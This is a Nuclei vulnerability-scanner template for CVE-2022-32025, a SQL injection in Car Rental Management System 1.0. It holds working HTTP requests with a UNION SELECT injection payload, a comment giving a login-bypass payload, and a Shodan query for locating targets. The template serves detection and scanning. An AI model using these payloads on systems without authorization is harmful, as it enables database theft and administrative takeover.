nuclei-templates/http/cves/2022/CVE-2022-32025.yaml

59 lines
2.2 KiB
YAML

id: CVE-2022-32025
info:
name: Car Rental Management System 1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32025
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-32025
cwe-id: CWE-89
epss-score: 0.00666
epss-percentile: 0.77425
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: car_rental_management_system_project
product: car_rental_management_system
shodan-query: http.html:"Car Rental Management System"
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project
variables:
num: "999999999"
http:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}%23&password={{password}}
- |
GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: {{Hostname}}
skip-variables-check: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200
# digest: 490a0046304402205d5d596c626edcaed8fa7fe5fe65d1482cf23af20ae0d6b47eb50731d75815560220395891f0b5154ef77eea646456d8110b9d7cfa595d2ca9d5a2753853d40b5fac:922c64590222798bb761d5b6d8e72950